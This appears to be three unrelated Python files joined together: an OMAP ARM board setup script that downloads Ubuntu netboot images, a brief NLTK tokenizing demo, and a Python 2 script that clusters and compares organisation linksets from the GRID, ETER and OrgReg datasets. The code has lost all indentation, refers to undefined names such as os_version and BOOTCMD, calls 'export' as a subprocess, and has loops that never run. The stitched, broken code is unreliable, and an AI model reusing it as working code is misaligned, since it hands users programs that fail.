QUANTAL_MLO_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/quantal/main/installer-armhf/current/images/omap4/netboot/MLO"
PRECISE_UBOOT_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/precise/main/installer-armhf/current/images/omap4/netboot/u-boot.bin"
QUANTAL_UBOOT_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/quantal/main/installer-armhf/current/images/omap4/netboot/u-boot.bin"
PRECISE_KERNEL_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/precise/main/installer-armhf/current/images/omap4/netboot/uImage"
QUANTAL_KERNEL_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/quantal/main/installer-armhf/current/images/omap4/netboot/uImage"
import subprocess
import os
def board_prepare():
KERNEL_URL = eval(os_version + "_KERNEL_URL")
#KERNEL_SUFFIX = eval(os_version + "_KERNEL_SUFFIX")
MLO_URL = eval(os_version + "_MLO_URL")
UBOOT_URL = eval(os_version + "_UBOOT_URL")
#Getting MLO
mlo_path = os.path.join(os.getcwd(), "tmp", "MLO")
print(MLO_URL)
ret = subprocess.call(["curl" , "-#", "-o", mlo_path, "-C", "-", MLO_URL])
#Getting UBOOT
uboot_path = os.path.join(os.getcwd(), "tmp", "u-boot.bin")
print(UBOOT_URL)
ret = subprocess.call(["curl" , "-#", "-o", uboot_path, "-C", "-", UBOOT_URL])
#Getting KERNEL
kernel_path = os.path.join(os.getcwd(), "tmp", "uImage")
print(KERNEL_URL)
ret = subprocess.call(["curl" , "-#", "-o", kernel_path, "-C", "-", KERNEL_URL])
#Setting up bootscript
bootcmd_path = os.path.join(os.getcwd(), "tmp", "boot.script")
bootcmd = open(bootcmd_path,"w")
bootcmd.write(BOOTCMD)
bootcmd.close()
ret = subprocess.call(["mkimage", "-A", "arm", "-T", "script",
"-C", "none", "-n", '"Boot Image"', "-d", "tmp/boot.script" , "boot/boot.src"])
#Copy files over the boot partition
ret = subprocess.call(["cp", "-v", mlo_path, "boot"])
ret = subprocess.call(["cp", "-v", uboot_path, "boot"])
ret = subprocess.call(["cp", "-v", kernel_path, "boot"])
#Setting up console
console_path = os.path.join(os.getcwd(), "tmp", "console.conf")
console = open(console_path,"w")
console.write(CONSOLE)
console.close()
ret = subprocess.call(["sudo", "cp" , console_path, "rootfs/etc/init/"])
console_script_path = os.path.join(os.getcwd(), "tmp", "serial-console")
console_script = open(console_script_path,"w")
console_script.write(SERIAL_CONSOLE_SCRIPT)
console_script.close()
ret = subprocess.call(["sudo", "cp" , console_script_path, "rootfs/bin/serial-console"])
#Cleaning
#rootfs_path = os.path.join(os.getcwd(), "rootfs")
#ret = subprocess.call(["sudo", "chroot", rootfs_path, "rm", "-rf", "/tmp/"]) BUG
def prepare_kernel_devenv():
import os
DEPS = ["git", "arm-linux-gnueabihf-gcc", "arm-linux-gnueabi-gcc"]
DEPS_PACKAGES = ["git", "gcc-arm-linux-gnueabi", "gcc-arm-linux-gnueabihf"]
try:
for dep in DEPS:
output = subprocess.check_output(["which" , dep])
except:
print("""
Missing dependencies, you can install them with:
sudo apt-get install %s""" % " ".join(DEPS_PACKAGES))
exit(1)
print("This process may take a while, please wait ...")
ret = subprocess.call(["git", "clone", "git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git"])
os.chdir("kernel")
ret = subprocess.call(["git", "checkout", "master"])
ret = subprocess.call(["export", "ARCH=arm"])
ret = subprocess.call(["export", "CROSS_COMPILE=arm-linux-gnueabihf-"])
ret = subprocess.call(["make", "omap2plus_defconfig"])
|
from nltk import sent_tokenize, word_tokenize
text = "Hello students, how are you doing today? Have you recovered from the exam? I hope you are feeling better. Things will be fine."
print(sent_tokenize(text))
print(word_tokenize(text))
for i in word_tokenize(text):
print(i) |
# encoding=utf-8
import math
def sigmoid(x):
# return math.exp(x)/ (math.exp(x) + 10)
return x / float(math.fabs(x) + 1.6)
import cStringIO as Buffer
import Alignments.UserActivities.Plots as Plt
import Alignments.UserActivities.Clustering as Cls
import Alignments.Settings as St
from os import listdir, system, path # , startfile
from Alignments.Utility import normalise_path as nrm
from os.path import join, isdir, isfile
import codecs # , subprocess
# import _winreg as winreg
# node = int(raw_input("\n\tNODES?\t"))
# v = int(raw_input("\n\tEDGES?\t"))
# d = int(raw_input("\n\tDIAMETER?\t"))
# b = int(raw_input("\n\tBRIDGE?\t"))
# b = 1
# d = 3
# v = 7
# node = 6
b = 4
d = 4
v = 4
node = 5
# ==> 0.32 / 0.35
# max_connectivity = node - 1
# max = node*(node - 1)/2
# nc = 1 - (v/float(max))
# nb = b / float(node -1)
# nd = (d - 1)/float (node - 2)
# quality = float(nc + nb + nd)/3
# quality2 = float(nd * nc + nb)/2
# quality3 = (1*math.pow(2,b)/math.pow(2,d) + nc) / float(2)
# print "MAX: {}\nCLOSURE: {}\nBRIDGE: {}\nDIAMETER: {}\nQUALITY: {} {} {}".format(
# max, nc, nb, nd, quality, quality2, quality3)
linkset_1 = "http://risis.eu/linkset/clustered_exactStrSim_N167245093"
linkset_2 = "http://risis.eu/linkset/clustered_exactStrSim_N1245679810818748702"
linkset_3 = "http://risis.eu/linkset/clustered_test"
resources_list = ["<http://risis.eu/orgref_20170703/resource/1389122>",
"<http://risis.eu/cordisH2020/resource/participant_993809912>",
"<http://www.grid.ac/institutes/grid.1034.6>"]
# print disambiguate_network(linkset_1, resources_list)
# Cls.cluster_d_test(linkset_4, network_size=3, directory="C:\Users\Al\Videos\LinkMetric",
# greater_equal=True, limit=50000)
linkset = "http://risis.eu/linkset/clustered_exactStrSim_N1245679810818748702"
org = "http://risis.eu/orgreg_20170718/resource/organization"
uni = "http://risis.eu/orgreg_20170718/ontology/class/University"
ds = "http://risis.eu/dataset/orgreg_20170718"
# resources_matched(alignment=linkset, dataset=ds, resource_type=uni, matched=True)
# THE INITIAL DATASET IS grid_20170712
grid_GRAPH = "http://risis.eu/dataset/grid_20170712"
grid_org_type = "http://xmlns.com/foaf/0.1/Organization"
grid_cluster_PROPS = ["<http://www.grid.ac/ontology/hasAddress>/<http://www.grid.ac/ontology/countryCode>",
"<http://www.grid.ac/ontology/hasAddress>/<http://www.grid.ac/ontology/countryName>"]
grid_link_org_props = ["http://www.w3.org/2000/01/rdf-schema#label", "http://www.w3.org/2004/02/skos/core#prefLabel",
"http://www.w3.org/2004/02/skos/core#altLabel",
"http://xmlns.com/foaf/0.1/homepage",
"<http://www.grid.ac/ontology/hasAddress>/<http://www.w3.org/2003/01/geo/wgs84_pos#lat>",
"<http://www.grid.ac/ontology/hasAddress>/<http://www.w3.org/2003/01/geo/wgs84_pos#long>"]
grid_main_dict = {St.graph: grid_GRAPH,
St.data: [{St.entity_datatype: grid_org_type, St.properties: grid_link_org_props}]}
# [ETER] DATASET TO ADD
eter_GRAPH = "http://risis.eu/dataset/eter_2014"
eter_cluster_PROPS = ["http://risis.eu/eter_2014/ontology/predicate/Country_Code"]
eter_org_type = "http://risis.eu/eter_2014/ontology/class/University"
eter_link_org_props = ["http://risis.eu/eter_2014/ontology/predicate/Institution_Name",
"<http://risis.eu/eter_2014/ontology/predicate/English_Institution_Name>",
"http://risis.eu/eter_2014/ontology/predicate/Name_of_foreign_institution",
"http://risis.eu/eter_2014/ontology/predicate/Institutional_website",
"http://risis.eu/eter_2014/ontology/predicate/Geographic_coordinates__longitude",
"http://risis.eu/eter_2014/ontology/predicate/Geographic_coordinates__latitude"]
eter_main_dict = {St.graph: eter_GRAPH,
St.data: [{St.entity_datatype: eter_org_type, St.properties: eter_link_org_props}]}
# [ORGREG] DATASET TO ADD
orgreg_GRAPH = "http://risis.eu/dataset/orgreg_20170718"
orgreg_cluster_PROPS = ["<http://risis.eu/orgreg_20170718/ontology/predicate/locationOf>"
"/<http://risis.eu/orgreg_20170718/ontology/predicate/Country_of_location>",
"http://risis.eu/orgreg_20170718/ontology/predicate/Country_of_establishment"]
orgreg_org_type = "http://risis.eu/orgreg_20170718/resource/organization"
orgreg_link_org_props = ["http://risis.eu/orgreg_20170718/ontology/predicate/Name_of_entity",
"http://risis.eu/orgreg_20170718/ontology/predicate/English_name_of_entity",
"http://risis.eu/orgreg_20170718/ontology/predicate/Entity_current_name_English",
"http://risis.eu/orgreg_20170718/ontology/predicate/Website_of_entity",
"<http://risis.eu/orgreg_20170718/ontology/predicate/locationOf>"
"/<http://risis.eu/orgreg_20170718/ontology/predicate/Geographical_coordinates__latitude>",
"<http://risis.eu/orgreg_20170718/ontology/predicate/locationOf>"
"/<http://risis.eu/orgreg_20170718/ontology/predicate/Geographical_coordinates__longitude>"]
orgreg_main_dict = {St.graph: orgreg_GRAPH,
St.data: [{St.entity_datatype: orgreg_org_type, St.properties: orgreg_link_org_props}]}
targets = [
grid_main_dict,
orgreg_main_dict,
eter_main_dict
]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
TEST FUNCTIONS
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def folder_check(file_1, file_2, diff_1=False, diff_2=False, intersection=False,
tracking=None, track_dir=None, activated=False):
if activated is False:
return None
keyword = "\tQUALITY USED"
set_a = set([])
set_b = set([])
folders_1 = []
folders_2 = []
if path.isdir(file_1):
folders_1 = [f for f in listdir(nrm(file_1)) if isdir(join(nrm(file_1), f))]
set_a = set(folders_1)
if path.isdir(file_2):
folders_2 = [f for f in listdir(nrm(file_2)) if isdir(join(nrm(file_2), f))]
set_b = set(folders_2)
print "\nPATH 1: {}".format(len(folders_1))
print "PATH : {}".format(len(folders_2))
# Dynamically get path to AcroRD32.exe
# acro_read = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, 'Software\\Adobe\\Acrobat\Exe')
if diff_1 is True:
diff = set_a - set_b
print "\nDIFF(FOLDER_1 [{}] - FOLDER_2 [{}]) = [{}]".format(len(folders_1), len(folders_2), len(diff))
count = 0
good = 0
bad = 0
uncertain = 0
for item in diff:
count += 1
output = "\t>>> {}".format(item)
target = join(nrm(file_1), item)
doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
if doc:
target_path = join(nrm(target), doc[0])
read = open(target_path)
while True:
node = read.readline()
if len(node) == 0:
break
if node.startswith(keyword):
value = float(node.replace(keyword, "").replace(":", "").strip())
if value <= 0.1:
good +=1
output = "{:<22}{:12}\t{}".format(output, "GOOD", value)
elif value >= 0.25:
bad += 1
output = "{:<22}{:12}\t{}".format(output, "BAD", value)
break
elif value > 0.1 and value < 0.25:
uncertain += 1
output = "{:<22}{:12}\t{}".format(output, "UNDECIDED", value)
read.close()
print output
# doc2 = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
# OPEN THE PDF FROM DEFAULT READER
# target_path2 = join(nrm(target), doc2[0])
# system(target_path2)
# startfile(target_path2)
# OPEN WITH ADOBE
# cmd = '{0} /N /T "{1}" ""'.format(acro_read, target_path2)
# print "PRINTING PDF"
# subprocess.Popen(cmd)
# reading = open(target_path2)
# print reading.read()
if doc and tracking is True:
target_path = join(nrm(target), doc[0])
read = open(target_path)
for i in range(0, 6):
node = read.readline().strip()
read.close()
print "\t{}-TRACKING {}". format(count, node)
track(directory=track_dir, resource=node, activated=activated)
next_step = raw_input("\n\tCONTINUE?\t")
if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
continue
else:
exit(0)
print "GOOD {0}/{3} BAD {1}/{3} UNCERTAIN {2}/{3}".format(good, bad, uncertain, len(diff))
if diff_2 is True:
count = 0
good = 0
bad = 0
uncertain = 0
diff = set_b - set_a
print "\nDIFF(FOLDER_2 [{}] - FOLDER_1 [{}]) = [{}]".format(len(folders_2), len(folders_1), len(diff))
for item in diff:
count += 1
output = "\t>>> {}".format(item)
target = join(nrm(file_2), item)
doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
# doc2 = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
if doc:
target_path = join(nrm(target), doc[0])
read = open(target_path)
while True:
node = read.readline()
if len(node) == 0:
break
if node.startswith(keyword):
value = float(node.replace(keyword, "").replace(":", "").strip())
if value <= 0.1:
good +=1
output = "{:<22}{:12}\t{}".format(output, "GOOD", value)
elif value >= 0.25:
bad += 1
output = "{:<22}{:12}\t{}".format(output, "BAD", value)
break
elif value > 0.1 and value < 0.25:
uncertain += 1
output = "{:<22}{:12}\t{}".format(output, "UNDECIDED", value)
read.close()
print output
if doc and tracking is True:
target_path = join(nrm(target), doc[0])
read = open(target_path)
for i in range(0, 6):
node = read.readline().strip()
read.close()
print "\t{}-TRACKING {}". format(count, node)
track(directory=track_dir, resource=node, activated=activated)
next_step = raw_input("\n\tCONTINUE?\t")
if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
continue
else:
exit(0)
print "GOOD {0}/{3} BAD {1}/{3} UNCERTAIN {2}/{3}".format(good, bad, uncertain, len(diff))
if intersection is True:
diff = set_a.intersection(set_b)
print "\nINTERSECTION(FOLDER_1 [{}] - FOLDER_2 [{}]) [{}]".format(
len(folders_1), len(folders_2), len(diff))
good = 0
bad = 0
uncertain = 0
for item in diff:
output = "\t>>> {}".format(item)
target = join(nrm(file_2), item)
doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
# doc2 = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
if doc:
target_path = join(nrm(target), doc[0])
read = open(target_path)
while True:
node = read.readline()
if len(node) == 0:
break
if node.startswith(keyword):
value = float(node.replace(keyword, "").replace(":", "").strip())
if value <= 0.1:
good +=1
output = "{:<22}{:12}\t{}".format(output, "GOOD", value)
elif value >= 0.25:
bad += 1
output = "{:<22}{:12}\t{}".format(output, "BAD", value)
break
elif value > 0.1 and value < 0.25:
uncertain += 1
output = "{:<22}{:12}\t{}".format(output, "UNDECIDED", value)
read.close()
print output
print "GOOD {0}/{3} BAD {1}/{3} UNCERTAIN {2}/{3}".format(good, bad, uncertain, len(diff))
def track(directory, resource, activated=False):
if activated is False:
return None
print "\nMAIN DIRECTORY {}".format(directory)
# LOOK FOR MAIN FOLDERS IN MAIN DIRECTORY
main_folders = [f for f in listdir(nrm(directory)) if isdir(join(nrm(directory), f))]
# GO THROUGH EACH MAIN FOLDER
for main_folder in main_folders:
main_path = join(directory, main_folder)
# print "\tMAIN-FOLDER: {}".format(main_folder)
# FOREACH MAIN FOLDER GAT THE SUB-FOLDER
sub_folders = [f for f in listdir(nrm(main_path)) if isdir(join(nrm(main_path), f))]
for sub_folder in sub_folders:
sub_path = join(main_path, sub_folder)
# print "\t\tSUB-FOLDER: {}".format(sub_folder)
# TARGET FOLDERS
target_folder = [f for f in listdir(nrm(sub_path)) if isdir(join(nrm(sub_path), f))]
for target in target_folder:
i_folder = "{}".format(join(main_path, sub_path, target))
# print "\t\t\tTARGET-FOLDER: {}".format(target)
i_file = [f for f in listdir(nrm(i_folder)) if isfile(join(nrm(i_folder), f))]
for target_file in i_file:
if target_file.lower().endswith(".txt"):
target_path = join(main_path, sub_path, target, target_file)
wr = codecs.open(target_path, "rb")
text = wr.read()
wr.close()
result = text.__contains__(resource)
if result is True:
print "\n\tMAIN-FOLDER: {}".format(main_folder)
print "\t\tSUB-FOLDER: {}".format(sub_folder)
print "\t\t\tTARGET-FOLDER: {}".format(target)
print "\t\t\t\tTARGET FILE: {}".format(target_file)
target = join(main_path, sub_path, target)
print "\tPATH: {}".format(target)
pdf = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
txt = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
trg_path = join(nrm(target), pdf[0])
txt_path = join(nrm(target), txt[0])
system(trg_path)
# system(txt_path)
# print "\t\t\t\t{}".format(result)
def investigate(target_directory, track_directory=None, activated=False):
if activated is False:
return None
folders = [f for f in listdir(nrm(target_directory)) if isdir(join(nrm(target_directory), f))]
print "\nINVESTIGATING NO: {}".format(len(folders))
count = 0
for item in folders:
count += 1
print "\t>>> {}".format(item)
target = join(nrm(target_directory), item)
doc = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.txt')]
pdf = [f for f in listdir(nrm(target)) if join(nrm(target), f).endswith('.pdf')]
if doc and pdf:
doc_path = join(nrm(target), doc[0])
read = open(doc_path)
node= ""
for i in range(0,6):
node = read.readline().strip()
if track_directory and path.isdir(track_directory):
print "\t{}-TRACKING {}".format(count, node)
track(directory=track_directory, resource=node, activated=activated)
# system(doc_path)
elif pdf:
pdf_path = join(nrm(target), pdf[0])
system(pdf_path)
# system(doc_path)
next_step = raw_input("\tCONTINUE?\t")
print ""
if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
continue
else:
exit(0)
def generate_eval_sheet(alignment, network_size, greater_equal=True, targets=None,):
# RUN THE CLUSTER
count = 0
tabs = "\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t"
a_builder = Buffer.StringIO()
a_builder.write("Count ID STRUCTURE E-STRUCTURE-SIZE NETWORK QUALITY REFERENCE\n")
clusters_0 = Cls.links_clustering(alignment, None)
for i_cluster in clusters_0.items():
children = i_cluster[1][St.children]
check = len(children) >= network_size if greater_equal else len(children) == network_size
first = False
if check:
count += 1
# 2: FETCHING THE CORRESPONDENTS
smallest_hash = float('inf')
for child in children:
hashed = hash(child)
if hashed <= smallest_hash:
smallest_hash = hashed
test(count, smallest_hash, a_builder, alignment, children)
# # MAKE SURE THE FILE NAME OF THE CLUSTER IS ALWAYS THE SAME
# smallest_hash = "{}".format(str(smallest_hash).replace("-", "N")) if str(
# smallest_hash).startswith("-") \
# else "P{}".format(smallest_hash)
#
# a_builder.write("\n{:5}\t{:20}{:12}{:20}{:20}".format(count, smallest_hash, "", "", ""))
# if targets is None:
# a_builder.write(Cls.disambiguate_network(alignment, children))
# else:
# response = Cls.disambiguate_network_2(children, targets, output=False)
# if response:
# temp = ""
# dataset = ""
# # for line in response:
# # print line
#
# for i in range(1, len(response)):
# if i == 1:
# temp = response[i][1]
#
# elif dataset == response[i][0]:
# temp = "{} | {}".format(temp, response[i][1])
#
#
# else:
# if first is False:
# a_builder.write("{}\n".format(temp))
# else:
# a_builder.write( "{:80}{}\n".format("", temp))
# first = True
# temp = response[i][1]
#
#
# dataset = response[i][0]
# a_builder.write( "{:80}{}\n".format("", temp))
print a_builder.getvalue()
# next_step = raw_input("\tCONTINUE?\t")
# if next_step.lower() == "yes" or next_step.lower() == "y" or next_step.lower() == "1":
# continue
# else:
# exit(0)
investigate("C:\Users\Al\Videos\LinkMetric\TRIAL-2\3_Analysis_20180111"
"\union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121", "C:\Users\Al\Videos\LinkMetric\TRIAL-2",
activated=False)
def test(count, smallest_hash, a_builder, alignment, children):
first = False
a_builder.write("\n{:<5}\t{:<20}{:12}{:20}{:20}".format(count, smallest_hash, "", "", ""))
if targets is None:
a_builder.write(Cls.disambiguate_network(alignment, children))
else:
response = Cls.disambiguate_network_2(children, targets, output=False)
if response:
temp = ""
dataset = ""
# for line in response:
# print line
for i in range(1, len(response)):
if i == 1:
temp = response[i][1]
elif dataset == response[i][0]:
temp = "{} | {}".format(temp, response[i][1])
else:
if first is False:
a_builder.write("{}\n".format(temp))
else:
a_builder.write("{:80}{}\n".format("", temp))
first = True
temp = response[i][1]
dataset = response[i][0]
a_builder.write("{:80}{}\n".format("", temp))
# generate_eval_sheet("http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121", network_size=3,
# greater_equal=False, targets=targets)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
COMPUTING AN ALIGNMENT STATISTICS
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# OUTPUT FALSE RETURNS THE MATRIX WHILE OUTPUT TRUE RETURNS THE DISPLAY MATRIX IN A TABLE FORMAT
stats = Cls.resource_stat(alignment=linkset, dataset=ds, resource_type=org, output=True, activated=False)
# for stat in stats:
# for key, value in stat.items():
# print "{:21} : {}".format(key, value)
# Cls.disambiguate_network_2(["<http://www.grid.ac/institutes/grid.474119.e>",
# "<http://risis.eu/orgreg_20170718/resource/HR1016>",
# "<http://www.grid.ac/institutes/grid.4808.4>"], targets, output=True)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
PLOT THE LINK NETWORK
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
size = 7
ls_4 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N1655042445"
ls_5 = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069"
ls_1k = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_P1640316176"
ls_app = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_N1942436340"
ls_app_50m = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P571882700"
directory = "C:\Users\Al\Videos\LinkMetric\Test-2"
Plt.cluster_d_test(ls_app_50m, network_size=3, targets=targets,
directory=directory, greater_equal=False, limit=70000, activated=False)
# # GEO-SIMILARITY OF NEARBY [1 KILOMETER]
# # REFINED BY EXACT MATCHED
# # ==> UNION OF 8 LINKSETS
# union_03 = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_P1476302481"
# directory = "C:\Users\Al\Videos\LinkMetric\Test-3"
# Plt.cluster_d_test(union_03, network_size=3, targets=targets,
# directory=directory, greater_equal=False, limit=70000, activated=False)
# track(directory, "Academy of Fine Arts Vienna", activated=False)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# RUN 00: GEO-SIMILARITY OF NEARBY [50 meters BEFORE]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# ==> UNION OF 8 LINKSETS
# 93 clusters of size 3
# 62 clusters of size 4
# 16 clusters of size 5
# 17 clusters of size 6
# 08 clusters of size 7
# 08 clusters of size 8
# 03 clusters of size 9
# 02 clusters of size 10
greater_equal = False
directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-5"
union_00 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P451472011"
union_01 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121"
track(directory, "C.D.A. College", activated=False)
for i in range(3, 0):
print "\nITERATION {}".format(i)
Plt.cluster_d_test(union_00, network_size=i, targets=targets,
directory=directory, greater_equal=greater_equal, limit=None, activated=True)
# GEO-SIMILARITY OF NEARBY [50 meters]
# REFINED BY REFINED MATCHED
# ==> UNION OF 8 LINKSETS
# 29 clusters of size 3
# 6 clusters of size 4
# 16 clusters of size 5
# 17 clusters of size 6
# directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-2"
track(directory, "Policejní akademie České republiky v Praze", activated=False)
for i in range(3, 0):
print "\nITERATION {}".format(i)
Plt.cluster_d_test(union_01, network_size=i, targets=targets,
directory=directory, greater_equal=greater_equal, limit=None, activated=True)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
RUN 02: GEO-SIMILARITY OF NEARBY [500 meters]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# GEO-SIMILARITY OF NEARBY [100 meters]
# REFINED BY REFINED MATCHED
# ==> UNION OF 8 LINKSETS
# 155 CLUSTERS of size 3
# 010 clusters of size 4
# 002 clusters of size 5
# 004 clusters of size 6
# union_02 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N545709154"
union_021 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N747654693"
union_022 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N758253463"
# directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-2"
track(directory, "Policejní akademie České republiky v Praze", activated=False)
for i in range(3, 0):
print "\nITERATION {}".format(i)
Plt.cluster_d_test(union_021, network_size=i, targets=targets,
directory=directory, greater_equal=greater_equal, limit=None, activated=True)
for i in range(3, 0):
print "\nITERATION {}".format(i)
Plt.cluster_d_test(union_022, network_size=i, targets=targets,
directory=directory, greater_equal=greater_equal, limit=None, activated=True)
# LOOKING AT CLUSTERS THAT EVOLVED AS THE MATCHING METHOD LOOSENS UP
# THE SET DIFFERENCE REVEALS THAT 26 CLUSTERS OF SIZE 3 EVOLVED
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
RUN 03: GEO-SIMILARITY OF NEARBY [2 KILOMETER]
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# GEO-SIMILARITY OF NEARBY [1 KILOMETER]
# REFINED BY REFINED MATCHED
# ==> UNION OF 8 LINKSETS
# 350 CLUSTERS of size 3
# 018 clusters of size 4
# 004 clusters of size 5
# 007 clusters of size 6
# union_03 = "http://risis.eu/lens/union_Eter_2014_Orgreg_20170718_Grid_20170712_P2072038799"
# BEFORE
union_031 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N1996365419"
# AFTER
union_032 = "http://risis.eu/lens/union_Grid_20170712_Eter_2014_Orgreg_20170718_N162258616"
# directory = "C:\Users\Al\Videos\LinkMetric\TRIAL-2"
track(directory, "Vilentum Hogeschool", activated=False)
for i in range(3, 0):
print "\nITERATION {}".format(i)
Plt.cluster_d_test(union_031, network_size=i, targets=targets,
directory=directory, greater_equal=greater_equal, limit=None, activated=True)
for i in range(3, 0):
print "\nITERATION {}".format(i)
Plt.cluster_d_test(union_032, network_size=i, targets=targets,
directory=directory, greater_equal=greater_equal, limit=None, activated=True)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
INVESTIGATION 01 : COMPARE CLUSTERS FORM 50 METERS TO THOSE OF 100 METERS AND 1 KILOMETER
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ANALYSIS_01 = "C:\Users\Al\Videos\LinkMetric\LinkAnalysis_01"
# CLUSTER USING NEARBY 50 METERS
set_01 = join(ANALYSIS_01, "3_Analysis_20180109union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121")
# CLUSTER USING NEARBY 100 METERS
set_02 = join(ANALYSIS_01, "3_Analysis_20180109\union_Grid_20170712_Eter_2014_Orgreg_20170718_N758253463")
# CLUSTER USING NEARBY 1000 METERS
set_03 = join(ANALYSIS_01, "3_Analysis_20180109\union_Grid_20170712_Eter_2014_Orgreg_20170718_N162258616")
# COMPARE CLUSTERS STEMMED FROM NEARBY 50 TO THOSE STEMMED FROM NEARBY 100
folder_check(set_01, set_02, diff_2=True, intersection=True, tracking=True, track_dir=ANALYSIS_01, activated=False)
# COMPARE CLUSTERS STEMMED FROM NEARBY 50 TO THOSE STEMMED FROM NEARBY 1000
folder_check(set_01, set_03, diff_1=True, tracking=True, track_dir=ANALYSIS_01, activated=False)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ANALYSING THE LINKED NETWORK FILES TEST-1
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
SIZE = 5
TEST_1 = "C:\Users\Al\Videos\LinkMetric\TRIAL-5\\"
# CLUSTER USING NEARBY 50 METERS BEFORE
set_0 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_P451472011".format(SIZE))
# CLUSTER USING NEARBY 50 METERS AFTER
set_1 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_P1310881121".format(SIZE))
# CLUSTER USING NEARBY 500 METERS BEFORE
set_2 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N747654693".format(SIZE))
# CLUSTER USING NEARBY 500 METERS AFTER
set_3 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N758253463".format(SIZE))
# CLUSTER USING NEARBY 1000 METERS and EXACT
set_4 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N1996365419".format(SIZE))
set_5 = join(TEST_1, "{}_Analysis_20180120\union_Grid_20170712_Eter_2014_Orgreg_20170718_N162258616".format(SIZE))
# LOOKING AT CLUSTERS THAT EVOLVED AS THE MATCHING METHOD LOOSENS UP
# THE SET DIFFERENCE REVEALS THAT 26 CLUSTERS OF SIZE 3 EVOLVED
folder_check(set_0, set_1, diff_1=True, intersection=True, tracking=False, track_dir=directory, activated=True)
print "\n**************************************************************\n"
folder_check(set_2, set_3, diff_1=True, intersection=True, tracking=False, track_dir=directory, activated=True)
print "\n**************************************************************\n"
folder_check(set_4, set_5, diff_1=True, intersection=True, tracking=False, track_dir=directory, activated=True)
# TRACKING THE CLUSTERS THAT EVOLVED
# track(directory, track_3)
folder_check(set_4, set_1, diff_2=True, tracking=True, track_dir=TEST_1, activated=False)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ANALYSING THE LINKED NETWORK FILES TEST-2
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# t50 = "C:\Users\Al\Videos\LinkMetric\7_Analysis_20171215\union_Eter_2014_Orgreg_20170718_Grid_20170712_N2030153069"
